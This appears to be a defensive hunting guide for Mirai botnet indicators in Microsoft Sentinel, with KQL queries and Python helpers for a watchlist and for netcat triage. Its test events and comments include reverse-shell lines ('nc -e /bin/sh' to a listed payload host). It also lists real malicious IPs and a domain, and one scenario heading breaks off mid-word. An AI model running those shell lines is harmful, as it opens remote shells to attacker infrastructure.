The ThreatFox: Mirai IOCs rule flags potential Mirai botnet activity by matching network telemetry against indicators that ThreatFox (abuse.ch) attributes to Mirai: command-and-control endpoints (botnet_cc) and hosts that serve bot binaries to freshly compromised IoT devices (payload_delivery). SOC teams should hunt for these indicators in Microsoft Sentinel (formerly Azure Sentinel) to find infected devices and cut off their C2 and download traffic before the bots are used in distributed denial-of-service (DDoS) attacks.
IOC Summary
Malware Family: Mirai
Total IOCs: 7
IOC Types: domain, ip:port
| Type | Value (defanged) | Threat Type | First Seen | Confidence |
|---|---|---|---|---|
| domain | justkiddin.live | botnet_cc | 2026-06-21 | 100% |
| ip:port | 216[.]128[.]153[.]60:51515 | botnet_cc | 2026-06-21 | 100% |
| ip:port | 217[.]60[.]195[.]160:4569 | payload_delivery | 2026-06-21 | 100% |
| ip:port | 217[.]60[.]195[.]160:4568 | payload_delivery | 2026-06-21 | 100% |
| ip:port | 217[.]60[.]195[.]160:9018 | payload_delivery | 2026-06-21 | 100% |
| ip:port | 203[.]154[.]14[.]18:8999 | payload_delivery | 2026-06-21 | 100% |
| ip:port | 203[.]154[.]14[.]18:2049 | payload_delivery | 2026-06-21 | 100% |
```kusto
// Hunt for network connections to known malicious IPs (firewall/proxy CEF logs)
// Source: ThreatFox - Mirai
let malicious_ips = dynamic(["217.60.195.160", "203.154.14.18", "216.128.153.60"]);
CommonSecurityLog
| where TimeGenerated > ago(30d)   // lookback window; widen it if the indicators predate your retention
| where DestinationIP in (malicious_ips) or SourceIP in (malicious_ips)
| project TimeGenerated, SourceIP, DestinationIP, DestinationPort, DeviceAction, Activity
| order by TimeGenerated desc
```
```kusto
// Hunt in Defender for Endpoint network events (shows which process made the connection)
// Source: ThreatFox - Mirai
let malicious_ips = dynamic(["217.60.195.160", "203.154.14.18", "216.128.153.60"]);
DeviceNetworkEvents
| where Timestamp > ago(30d)
| where RemoteIP in (malicious_ips)
| project Timestamp, DeviceName, RemoteIP, RemotePort, InitiatingProcessFileName, ActionType
| order by Timestamp desc
```
```kusto
// Hunt for DNS queries to known malicious domains
// Source: ThreatFox - Mirai
let malicious_domains = dynamic(["justkiddin.live"]);
DnsEvents
| where TimeGenerated > ago(30d)
// has_any is term-based, so it also matches subdomains such as cnc.justkiddin.live
| where Name has_any (malicious_domains)
| project TimeGenerated, Computer, Name, IPAddresses, QueryType
| order by TimeGenerated desc
```
| Sentinel Table | Notes |
|---|---|
| CommonSecurityLog | Populated by the CEF/Syslog connector (firewalls, proxies, IDS). Enable it and confirm that DestinationIP and DestinationPort are mapped for your device type. |
| DeviceNetworkEvents | Populated by the Microsoft Defender XDR (formerly Microsoft 365 Defender) connector with Defender for Endpoint raw events enabled. |
| DnsEvents | Populated by the Windows DNS Server connector. If you collect DNS through the AMA-based connector the data lands in ASimDnsActivityLogs instead, so adapt the query to that table. |
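The three hunts above carry the indicators as hard-coded literals and match on IP alone, although ThreatFox reports the payload_delivery and botnet_cc indicators as ip:port pairs. The following added Python example (not code from the page, from abuse.ch or from Microsoft) parses a ThreatFox-style record list, refangs the values, generates a port-aware CommonSecurityLog hunt plus the DNS hunt, and writes a CSV suitable for a Sentinel watchlist. The JSON sample is constructed from the seven indicators in the table; the watchlist name MiraiIOCs and the 30-day lookback are assumptions.

```python
"""Build port-aware Microsoft Sentinel hunts from a ThreatFox IOC export.

Added example, not code from this page or from abuse.ch. THREATFOX_JSON is a
constructed sample in the shape of a ThreatFox API "data" array ("ioc",
"ioc_type", "threat_type", "first_seen", "confidence_level"), filled with the
seven indicators from the table above, kept defanged so refang() is exercised.
"""
import csv
import io
import json
from collections import defaultdict

THREATFOX_JSON = """
{"query_status": "ok", "data": [
 {"ioc": "justkiddin.live", "ioc_type": "domain", "threat_type": "botnet_cc", "first_seen": "2026-06-21", "confidence_level": 100},
 {"ioc": "216[.]128[.]153[.]60:51515", "ioc_type": "ip:port", "threat_type": "botnet_cc", "first_seen": "2026-06-21", "confidence_level": 100},
 {"ioc": "217[.]60[.]195[.]160:4569", "ioc_type": "ip:port", "threat_type": "payload_delivery", "first_seen": "2026-06-21", "confidence_level": 100},
 {"ioc": "217[.]60[.]195[.]160:4568", "ioc_type": "ip:port", "threat_type": "payload_delivery", "first_seen": "2026-06-21", "confidence_level": 100},
 {"ioc": "217[.]60[.]195[.]160:9018", "ioc_type": "ip:port", "threat_type": "payload_delivery", "first_seen": "2026-06-21", "confidence_level": 100},
 {"ioc": "203[.]154[.]14[.]18:8999", "ioc_type": "ip:port", "threat_type": "payload_delivery", "first_seen": "2026-06-21", "confidence_level": 100},
 {"ioc": "203[.]154[.]14[.]18:2049", "ioc_type": "ip:port", "threat_type": "payload_delivery", "first_seen": "2026-06-21", "confidence_level": 100}
]}
"""


def refang(value: str) -> str:
    """Undo common defanging so indicators compare equal to raw log fields."""
    return value.replace("[.]", ".").replace("(.)", ".").replace("hxxp", "http")


def parse_iocs(raw_json: str) -> list:
    """Normalise ThreatFox records into dicts with type, value, port and threat_type."""
    iocs = []
    for rec in json.loads(raw_json)["data"]:
        value = refang(rec["ioc"].strip().lower())
        entry = {"type": rec["ioc_type"], "threat_type": rec["threat_type"],
                 "first_seen": rec["first_seen"], "confidence": int(rec["confidence_level"])}
        if entry["type"] == "ip:port":
            ip, _, port = value.rpartition(":")  # IPv4 only; bracketed IPv6 needs extra handling
            entry.update(value=ip, port=int(port))
        elif entry["type"] == "domain":
            entry.update(value=value, port=None)
        else:
            continue  # hashes and URLs are not used by the network hunts on this page
        iocs.append(entry)
    return iocs


def ip_ports(iocs: list) -> dict:
    """Map each C2/payload IP to the set of ports ThreatFox saw it on."""
    out = defaultdict(set)
    for i in iocs:
        if i["type"] == "ip:port":
            out[i["value"]].add(i["port"])
    return dict(out)


def domains(iocs: list) -> list:
    return sorted({i["value"] for i in iocs if i["type"] == "domain"})


def kql_list(values) -> str:
    return ", ".join(f'"{v}"' for v in sorted(values))


def build_network_hunt(iocs: list, lookback: str = "30d") -> str:
    """CommonSecurityLog hunt: IP-only match for breadth, joined against the exact
    ip:port pairs so true C2/payload hits sort to the top of the result set."""
    ports = ip_ports(iocs)
    rows = ",\n    ".join(f'"{ip}", {p}' for ip in sorted(ports) for p in sorted(ports[ip]))
    return f"""let malicious_ips = dynamic([{kql_list(ports)}]);
let malicious_ip_ports = datatable(ioc_ip:string, ioc_port:int) [
    {rows}
];
CommonSecurityLog
| where TimeGenerated > ago({lookback})
| where DestinationIP in (malicious_ips) or SourceIP in (malicious_ips)
| join kind=leftouter malicious_ip_ports
    on $left.DestinationIP == $right.ioc_ip and $left.DestinationPort == $right.ioc_port
| extend ExactPortMatch = isnotempty(ioc_ip)
| project TimeGenerated, SourceIP, DestinationIP, DestinationPort, DeviceAction, Activity, ExactPortMatch
| order by ExactPortMatch desc, TimeGenerated desc"""


def build_dns_hunt(iocs: list, lookback: str = "30d") -> str:
    return f"""let malicious_domains = dynamic([{kql_list(domains(iocs))}]);
DnsEvents
| where TimeGenerated > ago({lookback})
| where Name has_any (malicious_domains)
| project TimeGenerated, Computer, Name, IPAddresses, QueryType
| order by TimeGenerated desc"""


def watchlist_csv(iocs: list) -> str:
    """CSV for a Sentinel watchlist (assumed name MiraiIOCs); once uploaded the
    hunts can read it with _GetWatchlist('MiraiIOCs') instead of pasted literals."""
    buf = io.StringIO()
    w = csv.writer(buf)
    w.writerow(["Indicator", "IndicatorType", "Port", "ThreatType", "FirstSeen", "Confidence"])
    for i in iocs:
        w.writerow([i["value"], i["type"], "" if i["port"] is None else i["port"],
                    i["threat_type"], i["first_seen"], i["confidence"]])
    return buf.getvalue()


if __name__ == "__main__":
    parsed = parse_iocs(THREATFOX_JSON)
    print(build_network_hunt(parsed), build_dns_hunt(parsed), watchlist_csv(parsed), sep="\n\n")
```

Paste the printed KQL into Sentinel, or upload the CSV as a watchlist and swap the dynamic() literals for _GetWatchlist('MiraiIOCs'). The ExactPortMatch column separates a connection to 217.60.195.160:9018 (a download from the reported payload port) from other traffic to that host, which matters when a reported IP is a shared hosting address.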
Scenario: Scheduled System Backup Using nc (Netcat)
Description: A legitimate backup job uses nc to stream an archive to a backup host over the network.
Filter/Exclusion: Exclude nc processes whose command line carries backup-related arguments (e.g., a source path under /backup or a destination host named for the backup service).
Example Filter: process.name = "nc" and (process.args contains "backup" or process.args contains "restore")
Scenario: Admin Task Using nc for Network Diagnostics
Description: An administrator uses nc to test network connectivity or port availability (e.g., nc -z 192.168.1.1 22 for a connectivity check).
Filter/Exclusion: Exclude nc processes run with diagnostic flags (-z, -w, or -v). Note that -v also appears in common attacker one-liners (nc -v host port -e /bin/sh), so scope this exclusion to known admin accounts or jump hosts and never let it suppress a connection to one of the IOCs above.
Example Filter: process.name = "nc" and (process.args contains "-z" or process.args contains "-w" or process.args contains "-v")
Scenario: Cron Job Running nc for Log Aggregation
Description: A scheduled cron job uses nc to stream logs to a centralized logging server.
Filter/Exclusion: Exclude nc processes whose parent is cron and whose arguments reference log paths or the logging destination (the parent-process field name depends on your schema).
Example Filter: process.name = "nc" and (process.args contains "/var/log" or process.args contains "syslog")
Scenario: Docker Container Using nc for Internal Communication
Description: A Docker container uses nc to communicate with another container or service on the same network.
Filter/Exclusion: Exclude nc processes that run inside a container and whose source and destination IPs both fall within the container network range.
Example Filter: process.name = "nc" and container_id is not null and source_ip in container_network_range
**Scenario: Security Tool Using nc for Vulnerability Sc
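The exclusions above are written as pseudo-filters, and in their original form the `or` binds to bare strings rather than to a second `process.args contains` test. The following added Python example (not code from the page) applies the four scenarios with the intended grouping to constructed process events and shows why an IOC match or an exec flag must be evaluated before any exclusion: a connection to the Mirai payload host 203.154.14.18:8999 made with `nc -v ... -e /bin/sh` would otherwise be suppressed by the diagnostics exclusion. The event field names, the 172.16.0.0/12 container range and the events themselves are assumptions.

```python
"""Netcat (nc) false-positive exclusions as code, with an IOC override.

Added example, not code from this page. The event fields (process.name,
process.args, parent.name, container_id, source_ip, dest_ip, dest_port) and
the container network range are assumptions modelled on the page's filter
expressions; every event below is constructed. MIRAI_IP_PORTS holds the
ip:port indicators from the table on this page, refanged.
"""
import ipaddress
import shlex

CONTAINER_NETWORK_RANGE = ipaddress.ip_network("172.16.0.0/12")  # assumed; use your bridge/overlay CIDRs
DIAG_FLAGS = {"z", "w", "v"}                        # -z / -w / -v from the diagnostics scenario
EXEC_FLAGS = {"-e", "-c", "--exec", "--sh-exec"}    # run a program after connect: shell over nc, never benign
MIRAI_IP_PORTS = {("216.128.153.60", 51515), ("217.60.195.160", 4569), ("217.60.195.160", 4568),
                  ("217.60.195.160", 9018), ("203.154.14.18", 8999), ("203.154.14.18", 2049)}


def short_flags(tokens):
    """Letters from single-dash tokens, so '-zv' counts as both -z and -v."""
    return {c for t in tokens if t.startswith("-") and not t.startswith("--") for c in t[1:]}


def in_container_range(event):
    """Both endpoints must sit inside the container network for the Docker exclusion."""
    ips = [event.get("source_ip"), event.get("dest_ip")]
    return all(ip and ipaddress.ip_address(ip) in CONTAINER_NETWORK_RANGE for ip in ips)


def matched_exclusion(event):
    """Name of the benign scenario the event matches, or None.

    Grouping is process.name == "nc" AND (term1 OR term2), which is what the
    page's 'process.name = "nc" and process.args contains "backup" or "restore"'
    is meant to express."""
    if event.get("process.name") != "nc":
        return None
    args = event.get("process.args", "")
    tokens = shlex.split(args)
    if "backup" in args or "restore" in args:
        return "scheduled_backup"
    if short_flags(tokens) & DIAG_FLAGS:
        return "admin_diagnostics"
    if event.get("parent.name") == "cron" and ("/var/log" in args or "syslog" in args):
        return "cron_log_aggregation"
    if event.get("container_id") and in_container_range(event):
        return "docker_internal"
    return None


def triage(event):
    """Final verdict. IOC hits and exec flags are checked before exclusions so a
    flag such as -v in an attacker one-liner cannot suppress the alert."""
    if event.get("process.name") != "nc":
        return "ignore:not_nc"
    tokens = shlex.split(event.get("process.args", ""))
    if (event.get("dest_ip"), event.get("dest_port")) in MIRAI_IP_PORTS:
        return "alert:ioc_hit"
    if EXEC_FLAGS & set(tokens):
        return "alert:exec_flag"
    excl = matched_exclusion(event)
    return f"excluded:{excl}" if excl else "alert:unexplained_nc"


# Constructed sample events, one per scenario plus two that must alert
EVENTS = [
    {"process.name": "nc", "process.args": "nc backup-target.internal 9000 < /backup/db.tar.gz",
     "dest_ip": "10.0.0.5", "dest_port": 9000},
    {"process.name": "nc", "process.args": "nc -zv 192.168.1.1 22", "dest_ip": "192.168.1.1", "dest_port": 22},
    {"process.name": "nc", "process.args": "nc logs.internal 514 < /var/log/syslog", "parent.name": "cron",
     "dest_ip": "10.0.0.9", "dest_port": 514},
    {"process.name": "nc", "process.args": "nc app-db 5432", "container_id": "3f9c2a1b",
     "source_ip": "172.18.0.5", "dest_ip": "172.18.0.6", "dest_port": 5432},
    # carries -v, so the diagnostics exclusion alone would hide it; the IOC check fires first
    {"process.name": "nc", "process.args": "nc -v 203.154.14.18 8999 -e /bin/sh",
     "dest_ip": "203.154.14.18", "dest_port": 8999},
    {"process.name": "nc", "process.args": "nc -e /bin/bash 10.10.10.10 4444",
     "dest_ip": "10.10.10.10", "dest_port": 4444},
]


def triage_all(events=EVENTS):
    return [triage(e) for e in events]


if __name__ == "__main__":
    for e, verdict in zip(EVENTS, triage_all()):
        print(f"{verdict:30} {e['process.args']}")
```

The ordering in triage() is the point: matched_exclusion() on its own classifies the `nc -v 203.154.14.18 8999 -e /bin/sh` event as admin diagnostics, so any exclusion list for this rule has to be applied after, not instead of, the IOC match.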